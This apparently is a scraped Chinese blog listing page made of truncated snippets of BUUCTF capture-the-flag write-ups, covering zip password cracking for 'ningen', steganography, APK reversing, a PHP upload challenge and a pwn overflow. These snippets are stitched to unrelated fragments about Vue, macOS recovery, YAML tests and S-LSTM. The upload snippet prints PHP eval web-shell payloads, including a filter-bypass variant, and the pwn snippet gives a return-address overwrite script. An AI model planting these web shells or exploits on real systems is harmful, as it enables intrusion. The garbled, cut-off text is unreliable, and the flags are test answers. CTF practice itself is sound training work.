BUUCTF：ningen

CTF三年小白，随笔一写

https://buuoj.cn/challenges#[BUUCTF%202018]Onli

题目地址：https://buuoj.cn/challen址，点击，F5反汇编查看伪C代码int __stdcall sub_401090(HWND.

8571019910010110255125f=open('test.txt','r').readlines()for i in f: print(chr(int(i)),end=.

题目地址：https://buuoj.cn/challenges#rar根据提示使用ARCHPR进行四位数的掩码爆破口令是：8795flag{1773c5da790bd3caff38e3decd180eb7}

题目地址：https://buuoj.cn

https://buuoj.cn/challenges#USB使用010 Editacker得到内

[极客大挑战 2019]Upload看到后的第一印象肯定是先上传图片马试试<?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?>构造的语句中不能带有<?这样的话只能是构造一些其他语句了<script language="php">eval($_POST['shell']);</script>上传的格式为image,使用bp抓包进行修改![image.png](https://img-blo.

我的第一个pwn题。原理：修改返回地址以达到获得shell的目的。根据栈结构，我们将char s[]的15个字节填充上，再填充Caller‘s rbp 的8个字节即可到达Return address。脚本如下：from pwn import*p = remote("ip地址",port)payload = 'A'*15+'B'*8+p64(0x401186)p.sendline(payload)p

https://buuoj.cn/challenges#hashcatXML文件，添加文件后缀为ppt，有加密使用Accen

题目地址：https://buuoj.cn/challenges#greatescape下载附件得到一个流量包，追中TCP流，在tcp.stream eq 18，发现ssc

题目地址：https://buuoj.cn/challenges#snakebinwalk分析发现图片中隐写了压缩包，使用forem

题目地址：https://buuoj.cn/challenges#LSB题目提示是：LSB使用stegsolve打开，在Red plane 0、Grenn plane 0、Blue plane0通道发现图片的上方好有东西Analyse->Data Extract调整至如下，发现这是一张图片，Save Bin保存为flag.png`cumtc

ningen 从16进制看可以发现其中有压缩包，存在着504b0304，使用binwalk分离即可 压缩包带，根据提示是四位纯数字 使用ARCHPR破解即可 ...

提示：人类的科学日益发展，对自然的研究依然无法满足，传闻日本科学家秋明重组了基因序列，造出了名为ningen的超自然生物。某天特工小明偶然截获了日本与俄罗斯的秘密通信，文件就是一张ningen的特写，小明通过社工，知道了秋明特别讨厌中国的六位银行密码，喜欢四位数。你能找出黑暗科学家秋明的秘密么？ 注 ...

下载zip解压拖进虚拟机的IDA64中，直接可得 ...

下载后发现是apk格式的文件（安卓 下载aokIDE查看，找到主函数 ...

下载后发现是apk格式的文件（安卓下载apkIDE查看（helloworld那一题的工具试试点开后太多东西了，没啥思路按习惯点开最后一个com文件，发现mainactivity文件，点开下拉 发现一长串数字，可能是提示转换成ascii后pvkq{m164675262033l4m49lnp7p9mnk28k75}pvkq形似flag，可能是移位加密--凯撒加密flag{c16

打开附件给了一个文本，里面是........ 仔细观察一下，似乎是16进制字符串（因为没有大于f的），放到16进制编辑器里，看看会有什么 是个rar的压缩包，保存提取。。。。却发现有密码，题目也没给什么提示。去看看是不是伪加密，很明显不是。那就只能用ARCHPR尝试爆破。还好密码是四位纯数字。 解压 ...

点开要求输入密码，拖入IDA查看，查看strings看样子没有加壳，进入passwd字符查看 输入一个长度为6的字符串，atoi函数是一个把字符串转换成整数型的函数，strcat在6位字符串后加上@DBApp 猜测sub_40100A是一个加密函数 进入查看 查看https://docs.micro ...

vue源码(三)-vue组件插件开发插件通常用来为 Vue 添加全局功能。插件的功能范围没有严格的限制——一般有下面几种：添加全局方法或者属性。如: vue-custom-element添加全局资源：指令/过滤器/过渡等。如 vue-touch通过全局混入来添加一些组件选项。如 vue-router添加 Vue 实例方法，通过把它们添加到 Vue.prototype 上实现。一个库，提供自己的 A

用CleanMyMac2清理文件之后，mac 死机，强制关机重启后进入灰屏，出现五国语言。 重新启动mac 并按住option按键，进入修复界面后，输入wifi密码，选择右侧的备份硬盘，后出现如下画面。（或者启动时直接 Shift-Command-V） 有人用磁盘修复可以成功启动，我通过选择第二项“重新安装mac os”修复系统，保证网络通畅，mac会自动下载相关文件，你做需要做的就是等待，下载完

在《测试用例中实现Python函数的定义》中，介绍了在YAML/JSON测试用例中实现Python函数定义的两种方法，以及它们各自适用的场景。但是在YAML/JSON文本中要怎样实现函数的调用和传参呢？variable_binds: - TOKEN: debugtalk - json: {} - random: ${gen_random_string(5)} - authorization: ${

虽然本文中没有提到图神经网络的概念，但是从其实际操作上还是被归类为图的空间方法的一种。本文为了克服了BiLSTM局限于顺序文本的缺点，提出了新的模型S-LSTM，利用Recurrent steps在单词之间同时执行本地和全局信息交换，而不是对单词序列进行增量读取。换句话说，S-LSTM为LSTM增加了全局结点，并使用与LSTM同样的门规则对全局节点的信息进行更新，全局结点的信息也被用于与句子中的

欢迎使用Markdown编辑器你好！ 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章，了解一下Markdown的基本语法知识。新的改变我们对Markdown编辑器进行了一些功能拓展与语法支持，除了标准的Markdown编辑器功能，我们增加了如下几点新功能，帮助你用它写博客：全新的界面设计 ，将会带来全新的写作体验；在创作